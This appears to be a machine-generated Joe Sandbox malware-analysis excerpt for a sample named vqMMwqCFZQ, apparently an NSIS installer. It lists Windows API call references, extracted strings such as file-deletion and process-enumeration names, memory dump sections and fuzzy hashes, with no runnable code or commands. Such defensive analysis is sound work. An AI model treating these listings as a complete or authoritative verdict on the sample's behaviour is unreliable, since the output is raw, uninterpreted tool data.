                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
                                          • Instruction ID: 01891581271c5a124b16634c3a8992e7a6857e255b4271240234ec945a90a24d
                                          • Opcode Fuzzy Hash: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
                                          • Instruction Fuzzy Hash: 73713571908248DBEF18CF28C894AAD3BF1FB44355F14812AFC56AB291D738E985DF85
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          APIs
                                          • GlobalFree.KERNELBASE(?), ref: 004073C5
                                          • GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 004073CE
                                          • GlobalFree.KERNELBASE(?), ref: 0040743D
                                          • GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 00407448
                                          Similarity
                                          • API ID: Global$AllocFree
                                          • String ID:
                                          • API String ID: 3394109436-0
                                          APIs
                                          • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                          • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                          Similarity
                                          • API ID: MessageSend
                                          • String ID:
                                          • API String ID: 3850602802-0
                                          APIs
                                          • GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                          • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                          Similarity
                                          • API ID: File$AttributesCreate
                                          • String ID:
                                          • API String ID: 415043291-0
                                          APIs
                                          • GetFileAttributesW.KERNELBASE(?,00406E81,?,?,?), ref: 00405E34
                                          • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E47
                                          Similarity
                                          • API ID: AttributesFile
                                          • String ID:
                                          • API String ID: 3188754299-0
                                          APIs
                                          • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033CE,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                          Similarity
                                          • API ID: FileRead
                                          • String ID:
                                          • API String ID: 2738559852-0
                                          APIs
                                            • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                            • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                            • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                            • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                          • CreateDirectoryW.KERNELBASE(004D70C8,00000000,004D70C8,004D70C8,004D70C8,-00000002,00403A0B), ref: 004037ED
                                          Similarity
                                          • API ID: Char$Next$CreateDirectoryPrev
                                          • String ID:
                                          • API String ID: 4115351271-0
                                          APIs
                                          • SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                          Similarity
                                          • API ID: MessageSend
                                          • String ID:
                                          • API String ID: 3850602802-0
                                          APIs
                                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040375A,?,?,?,?,00000000,00403A47,?), ref: 00403376
                                          Similarity
                                          • API ID: FilePointer
                                          • String ID:
                                          • API String ID: 973152223-0
                                          APIs
                                          • SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6
                                          Similarity
                                          • API ID: MessageSend
                                          • String ID:
                                          • API String ID: 3850602802-0
                                          APIs
                                          • KiUserCallbackDispatcher.NTDLL(?,0040574D), ref: 00403D8F
                                          Similarity
                                          • API ID: CallbackDispatcherUser
                                          • String ID:
                                          • API String ID: 2492992576-0
                                          APIs
                                          • CloseHandle.KERNELBASE(FFFFFFFF,00403AD1,?), ref: 00403864
                                          Similarity
                                          • API ID: CloseHandle
                                          • String ID:
                                          • API String ID: 2962429428-0
                                          APIs
                                          • GetDlgItem.USER32(?,000003F9), ref: 00404993
                                          • GetDlgItem.USER32(?,00000408), ref: 004049A0
                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 004049EF
                                          • LoadBitmapW.USER32(0000006E), ref: 00404A02
                                          • SetWindowLongW.USER32(?,000000FC,Function_000048CC), ref: 00404A1C
                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A2E
                                          • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A42
                                          • SendMessageW.USER32(?,00001109,00000002), ref: 00404A58
                                          • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A64
                                          • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404A74
                                          • DeleteObject.GDI32(?), ref: 00404A79
                                          • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AA4
                                          • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404AB0
                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B51
                                          • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404B74
                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B85
                                          • GetWindowLongW.USER32(?,000000F0), ref: 00404BAF
                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BBE
                                          • ShowWindow.USER32(?,00000005), ref: 00404BCF
                                          • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CCD
                                          • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D28
                                          • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D3D
                                          • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D61
                                          • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404D87
                                          • ImageList_Destroy.COMCTL32(?), ref: 00404D9C
                                          • GlobalFree.KERNEL32(?), ref: 00404DAC
                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E1C
                                          • SendMessageW.USER32(?,00001102,?,?), ref: 00404ECA
                                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404ED9
                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00404EF9
                                          • ShowWindow.USER32(?,00000000), ref: 00404F49
                                          • GetDlgItem.USER32(?,000003FE), ref: 00404F54
                                          • ShowWindow.USER32(00000000), ref: 00404F5B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                          • String ID: $ @$M$N
                                          • API String ID: 1638840714-3479655940
                                          • Opcode ID: 222e44079ed98782fbb34ec8da515d99173e785f6e02dcb26c66960398e67004
                                          • Instruction ID: e2b6c32447eba08f07ab18e4c0942225b167af9b9c7e550a0b0592367213937f
                                          • Opcode Fuzzy Hash: 222e44079ed98782fbb34ec8da515d99173e785f6e02dcb26c66960398e67004
                                          • Instruction Fuzzy Hash: 09026CB0900209AFEF209FA4CD45AAE7BB5FB84314F10413AF615B62E1D7B89D91DF58
                                          APIs
                                          • GetDlgItem.USER32(?,000003F0), ref: 004044F9
                                          • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404507
                                          • GetDlgItem.USER32(?,000003FB), ref: 00404527
                                          • GetAsyncKeyState.USER32(00000010), ref: 0040452E
                                          • GetDlgItem.USER32(?,000003F0), ref: 00404543
                                          • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404554
                                          • SetWindowTextW.USER32(?,?), ref: 00404583
                                          • SHBrowseForFolderW.SHELL32(?), ref: 0040463D
                                          • lstrcmpiW.KERNEL32(00462540,00447240,00000000,?,?), ref: 0040467A
                                          • lstrcatW.KERNEL32(?,00462540), ref: 00404686
                                          • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404696
                                          • CoTaskMemFree.OLE32(00000000), ref: 00404648
                                            • Part of subcall function 00405C84: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403F81), ref: 00405C97
                                            • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                            • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                            • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                            • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                            • Part of subcall function 00403E74: lstrcatW.KERNEL32(00000000,00000000,0046A560,004C70A8,install.log,00405A9C,004C70A8,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006), ref: 00403E8F
                                          • GetDiskFreeSpaceW.KERNEL32(00443238,?,?,0000040F,?,00443238,00443238,?,00000000,00443238,?,?,000003FB,?), ref: 00404759
                                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404774
                                            • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                          • SetDlgItemTextW.USER32(00000000,00000400,00409264), ref: 004047ED
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                          • String ID: 82D$@%F$@rD$A
                                          • API String ID: 3347642858-1086125096
                                          • Opcode ID: 41223eded68e0cc8c9bf9fa9bd2dae48608aba550ad56c91da83586f0d18507e
                                          • Instruction ID: 5c5d6a603380bcdbc7d7d35b60f5621b43697e5e98684918e033f9398a36e476
                                          • Opcode Fuzzy Hash: 41223eded68e0cc8c9bf9fa9bd2dae48608aba550ad56c91da83586f0d18507e
                                          • Instruction Fuzzy Hash: D1B1A4B1900209BBDB11AFA1CD85AAF7AB8EF45314F10847BF605B72D1D77C8A41CB59
                                          APIs
                                          • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                                          • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F30
                                          • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FA9
                                          • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FB5
                                          • lstrcmpA.KERNEL32(name,?), ref: 00406FC7
                                          • CloseHandle.KERNEL32(?), ref: 004071E6
                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                          • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                          • API String ID: 1916479912-1189179171
                                          • Opcode ID: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
                                          • Instruction ID: 34713ba181b26839f7619e948cf229fd8716e5ee99c03f3e8673f79b0d3e70cf
                                          • Opcode Fuzzy Hash: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
                                          • Instruction Fuzzy Hash: 9091BF70D1412DAACF04EBA5DD909FEBBBAEF48301F00416AF592F72D0E6785A05DB64
                                          APIs
                                          • DeleteFileW.KERNEL32(?,?,004C30A0), ref: 00406CB8
                                          • lstrcatW.KERNEL32(0045C918,\*.*,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D09
                                          • lstrcatW.KERNEL32(?,00408838,?,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D29
                                          • lstrlenW.KERNEL32(?), ref: 00406D2C
                                          • FindFirstFileW.KERNEL32(0045C918,?), ref: 00406D40
                                          • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E22
                                          • FindClose.KERNEL32(?), ref: 00406E33
                                          Strings
                                          • Delete: DeleteFile on Reboot("%s"), xrefs: 00406DE0
                                          • Delete: DeleteFile failed("%s"), xrefs: 00406DFD
                                          • Delete: DeleteFile("%s"), xrefs: 00406DBC
                                          • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EB0
                                          • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406E93
                                          • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E58
                                          • \*.*, xrefs: 00406D03
                                          • RMDir: RemoveDirectory("%s"), xrefs: 00406E6F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                          • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*
                                          • API String ID: 2035342205-3294556389
                                          • Opcode ID: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
                                          • Instruction ID: 0ca3ec5a28b3c1cae8259a28e21d86b18febecd5c0179aed135e39ed79665852
                                          • Opcode Fuzzy Hash: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
                                          • Instruction Fuzzy Hash: 2D51E3315043056ADB20AB61CD46EAF37B89F81725F22803FF943751D2DB7C49A2DAAD
                                          APIs
                                          • GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                          • GetSystemDirectoryW.KERNEL32(00462540,00002004), ref: 00406958
                                            • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                          • GetWindowsDirectoryW.KERNEL32(00462540,00002004), ref: 0040696B
                                          • lstrcatW.KERNEL32(00462540,\Microsoft\Internet Explorer\Quick Launch), ref: 004069E5
                                          • lstrlenW.KERNEL32(00462540,0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 00406A47
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                          • String ID: @%F$@%F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                          • API String ID: 3581403547-784952888
                                          • Opcode ID: 5b9b76f287d52b653a8a41dc6b1224aada0ccbd74d66441f1f03372adecf381e
                                          • Instruction ID: 7881bd453c5698e0e02013fa1c3524f2cf467b60749c67c5a59258f73e57ab2a
                                          • Opcode Fuzzy Hash: 5b9b76f287d52b653a8a41dc6b1224aada0ccbd74d66441f1f03372adecf381e
                                          • Instruction Fuzzy Hash: F171F4B1A00215ABDB20AF28CD44A7E3771EF55314F12C03FE906B62E0E77C89A19B5D
                                          APIs
                                          • CoCreateInstance.OLE32(00409B24,?,00000001,00409B04,?), ref: 0040257E
                                          Strings
                                          • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID: CreateInstance
                                          • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                          • API String ID: 542301482-1377821865
                                          • Opcode ID: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
                                          • Instruction ID: c24c797a6f187c751e7d972b1a807078ee58ffeb38f484aa28d094541f0f6205
                                          • Opcode Fuzzy Hash: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
                                          • Instruction Fuzzy Hash: 02415E74A00205BFCF04EFA0CC99EAE7B79FF48314B20456AF915EB2E1C679A941CB54
                                          APIs
                                          • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402E27
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID: FileFindFirst
                                          • String ID:
                                          • API String ID: 1974802433-0
                                          • Opcode ID: 005be0a9498432eb51f9697d6085e84733c01c19a866f8c94ce5140aa3afdc34
                                          • Instruction ID: b91193b5dd17d351e639dca097a4c2443a83fae7855d8014906372cda19badf2
                                          • Opcode Fuzzy Hash: 005be0a9498432eb51f9697d6085e84733c01c19a866f8c94ce5140aa3afdc34
                                          • Instruction Fuzzy Hash: 4EE06D32600204AFD700EB749D45ABE736CDF01329F20457BF146F20D1E6B89A41976A
                                          APIs
                                          • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063BF
                                          • lstrlenW.KERNEL32(?), ref: 004063CC
                                          • GetVersionExW.KERNEL32(?), ref: 0040642A
                                            • Part of subcall function 0040602B: CharUpperW.USER32(?,00406401,?), ref: 00406031
                                          • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406469
                                          • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00406488
                                          • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00406492
                                          • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040649D
                                          • FreeLibrary.KERNEL32(00000000), ref: 004064D4
                                          • GlobalFree.KERNEL32(?), ref: 004064DD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                          • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                          • API String ID: 20674999-2124804629
                                          • Opcode ID: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
                                          • Instruction ID: f5db07f83b48746be4b9c4f5c588c21b75103c60b5638216cabcef37c42edb4d
                                          • Opcode Fuzzy Hash: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
                                          • Instruction Fuzzy Hash: 38919331900219EBDF109FA4CD88AAFBBB8EF44741F11447BE546F6281DB388A51CF68
                                          APIs
                                          • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040416D
                                          • GetDlgItem.USER32(?,000003E8), ref: 00404181
                                          • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040419E
                                          • GetSysColor.USER32(?), ref: 004041AF
                                          • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041BD
                                          • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041CB
                                          • lstrlenW.KERNEL32(?), ref: 004041D6
                                          • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004041E3
                                          • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004041F2
                                            • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404124,?), ref: 00403FE1
                                            • Part of subcall function 00403FCA: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404124,?), ref: 00403FF0
                                            • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404124,?), ref: 00404004
                                          • GetDlgItem.USER32(?,0000040A), ref: 0040424A
                                          • SendMessageW.USER32(00000000), ref: 00404251
                                          • GetDlgItem.USER32(?,000003E8), ref: 0040427E
                                          • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042C1
                                          • LoadCursorW.USER32(00000000,00007F02), ref: 004042CF
                                          • SetCursor.USER32(00000000), ref: 004042D2
                                          • ShellExecuteW.SHELL32(0000070B,open,00462540,00000000,00000000,00000001), ref: 004042E7
                                          • LoadCursorW.USER32(00000000,00007F00), ref: 004042F3
                                          • SetCursor.USER32(00000000), ref: 004042F6
                                          • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404325
                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404337
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1763029616.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1763011202.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763049787.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763076432.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1763153474.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_vqMMwqCFZQ.jbxd
                                          Similarity
                                          • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                          • String ID: @%F$N$open
                                          • API String ID: 3928313111-3849437375
                                          • Opcode ID: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
                                          • Instruction ID: 2c1438ad93098d7b112eeb2502b55652a68651cb38e922ac8f4fb42b83a973d4
                                          • Opcode Fuzzy Hash: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
